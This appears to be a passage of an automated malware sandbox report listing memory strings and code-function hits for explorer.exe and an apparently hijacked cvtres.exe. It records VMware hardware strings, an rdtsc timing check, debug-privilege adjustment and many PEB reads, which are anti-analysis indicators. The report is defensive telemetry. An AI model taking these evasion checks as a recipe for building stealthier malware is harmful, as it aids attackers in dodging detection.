          Source: explorer.exe, 00000004.00000000.448394105.000000000DFD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.444641746.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
          Source: explorer.exe, 00000004.00000000.444641746.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.469543129.0000000007F92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.465310465.0000000006915000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.444641746.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.448394105.000000000DFD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}**%2
          Source: explorer.exe, 00000004.00000000.469543129.0000000007F92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004088C0 rdtsc 3_2_004088C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C7D50 mov eax, dword ptr fs:[00000030h]3_2_055C7D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E3D43 mov eax, dword ptr fs:[00000030h]3_2_055E3D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05623540 mov eax, dword ptr fs:[00000030h]3_2_05623540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05653D40 mov eax, dword ptr fs:[00000030h]3_2_05653D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CC577 mov eax, dword ptr fs:[00000030h]3_2_055CC577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CC577 mov eax, dword ptr fs:[00000030h]3_2_055CC577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05678D34 mov eax, dword ptr fs:[00000030h]3_2_05678D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0562A537 mov eax, dword ptr fs:[00000030h]3_2_0562A537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566E539 mov eax, dword ptr fs:[00000030h]3_2_0566E539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D4D3B mov eax, dword ptr fs:[00000030h]3_2_055D4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D4D3B mov eax, dword ptr fs:[00000030h]3_2_055D4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D4D3B mov eax, dword ptr fs:[00000030h]3_2_055D4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AAD30 mov eax, dword ptr fs:[00000030h]3_2_055AAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B3D34 mov eax, dword ptr fs:[00000030h]3_2_055B3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566FDE2 mov eax, dword ptr fs:[00000030h]3_2_0566FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566FDE2 mov eax, dword ptr fs:[00000030h]3_2_0566FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566FDE2 mov eax, dword ptr fs:[00000030h]3_2_0566FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566FDE2 mov eax, dword ptr fs:[00000030h]3_2_0566FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05658DF1 mov eax, dword ptr fs:[00000030h]3_2_05658DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626DC9 mov eax, dword ptr fs:[00000030h]3_2_05626DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626DC9 mov eax, dword ptr fs:[00000030h]3_2_05626DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626DC9 mov eax, dword ptr fs:[00000030h]3_2_05626DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626DC9 mov ecx, dword ptr fs:[00000030h]3_2_05626DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626DC9 mov eax, dword ptr fs:[00000030h]3_2_05626DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626DC9 mov eax, dword ptr fs:[00000030h]3_2_05626DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BD5E0 mov eax, dword ptr fs:[00000030h]3_2_055BD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BD5E0 mov eax, dword ptr fs:[00000030h]3_2_055BD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DFD9B mov eax, dword ptr fs:[00000030h]3_2_055DFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DFD9B mov eax, dword ptr fs:[00000030h]3_2_055DFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056705AC mov eax, dword ptr fs:[00000030h]3_2_056705AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056705AC mov eax, dword ptr fs:[00000030h]3_2_056705AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A2D8A mov eax, dword ptr fs:[00000030h]3_2_055A2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A2D8A mov eax, dword ptr fs:[00000030h]3_2_055A2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A2D8A mov eax, dword ptr fs:[00000030h]3_2_055A2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A2D8A mov eax, dword ptr fs:[00000030h]3_2_055A2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A2D8A mov eax, dword ptr fs:[00000030h]3_2_055A2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2581 mov eax, dword ptr fs:[00000030h]3_2_055D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2581 mov eax, dword ptr fs:[00000030h]3_2_055D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2581 mov eax, dword ptr fs:[00000030h]3_2_055D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2581 mov eax, dword ptr fs:[00000030h]3_2_055D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D82 mov eax, dword ptr fs:[00000030h]3_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D82 mov eax, dword ptr fs:[00000030h]3_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D82 mov eax, dword ptr fs:[00000030h]3_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D82 mov eax, dword ptr fs:[00000030h]3_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D82 mov eax, dword ptr fs:[00000030h]3_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D82 mov eax, dword ptr fs:[00000030h]3_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D82 mov eax, dword ptr fs:[00000030h]3_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D1DB5 mov eax, dword ptr fs:[00000030h]3_2_055D1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D1DB5 mov eax, dword ptr fs:[00000030h]3_2_055D1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D1DB5 mov eax, dword ptr fs:[00000030h]3_2_055D1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D35A1 mov eax, dword ptr fs:[00000030h]3_2_055D35A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DA44B mov eax, dword ptr fs:[00000030h]3_2_055DA44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DAC7B mov eax, dword ptr fs:[00000030h]3_2_055DAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB477 mov eax, dword ptr fs:[00000030h]3_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C746D mov eax, dword ptr fs:[00000030h]3_2_055C746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563C450 mov eax, dword ptr fs:[00000030h]3_2_0563C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563C450 mov eax, dword ptr fs:[00000030h]3_2_0563C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661C06 mov eax, dword ptr fs:[00000030h]3_2_05661C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626C0A mov eax, dword ptr fs:[00000030h]3_2_05626C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626C0A mov eax, dword ptr fs:[00000030h]3_2_05626C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626C0A mov eax, dword ptr fs:[00000030h]3_2_05626C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626C0A mov eax, dword ptr fs:[00000030h]3_2_05626C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0567740D mov eax, dword ptr fs:[00000030h]3_2_0567740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0567740D mov eax, dword ptr fs:[00000030h]3_2_0567740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0567740D mov eax, dword ptr fs:[00000030h]3_2_0567740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DBC2C mov eax, dword ptr fs:[00000030h]3_2_055DBC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626CF0 mov eax, dword ptr fs:[00000030h]3_2_05626CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626CF0 mov eax, dword ptr fs:[00000030h]3_2_05626CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05626CF0 mov eax, dword ptr fs:[00000030h]3_2_05626CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056614FB mov eax, dword ptr fs:[00000030h]3_2_056614FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05678CD6 mov eax, dword ptr fs:[00000030h]3_2_05678CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B849B mov eax, dword ptr fs:[00000030h]3_2_055B849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664496 mov eax, dword ptr fs:[00000030h]3_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05678F6A mov eax, dword ptr fs:[00000030h]3_2_05678F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BEF40 mov eax, dword ptr fs:[00000030h]3_2_055BEF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BFF60 mov eax, dword ptr fs:[00000030h]3_2_055BFF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CF716 mov eax, dword ptr fs:[00000030h]3_2_055CF716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DA70E mov eax, dword ptr fs:[00000030h]3_2_055DA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DA70E mov eax, dword ptr fs:[00000030h]3_2_055DA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB73D mov eax, dword ptr fs:[00000030h]3_2_055CB73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB73D mov eax, dword ptr fs:[00000030h]3_2_055CB73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0567070D mov eax, dword ptr fs:[00000030h]3_2_0567070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0567070D mov eax, dword ptr fs:[00000030h]3_2_0567070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DE730 mov eax, dword ptr fs:[00000030h]3_2_055DE730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563FF10 mov eax, dword ptr fs:[00000030h]3_2_0563FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563FF10 mov eax, dword ptr fs:[00000030h]3_2_0563FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A4F2E mov eax, dword ptr fs:[00000030h]3_2_055A4F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A4F2E mov eax, dword ptr fs:[00000030h]3_2_055A4F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E37F5 mov eax, dword ptr fs:[00000030h]3_2_055E37F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B8794 mov eax, dword ptr fs:[00000030h]3_2_055B8794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05627794 mov eax, dword ptr fs:[00000030h]3_2_05627794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05627794 mov eax, dword ptr fs:[00000030h]3_2_05627794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05627794 mov eax, dword ptr fs:[00000030h]3_2_05627794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B7E41 mov eax, dword ptr fs:[00000030h]3_2_055B7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B7E41 mov eax, dword ptr fs:[00000030h]3_2_055B7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B7E41 mov eax, dword ptr fs:[00000030h]3_2_055B7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B7E41 mov eax, dword ptr fs:[00000030h]3_2_055B7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B7E41 mov eax, dword ptr fs:[00000030h]3_2_055B7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B7E41 mov eax, dword ptr fs:[00000030h]3_2_055B7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566AE44 mov eax, dword ptr fs:[00000030h]3_2_0566AE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566AE44 mov eax, dword ptr fs:[00000030h]3_2_0566AE44
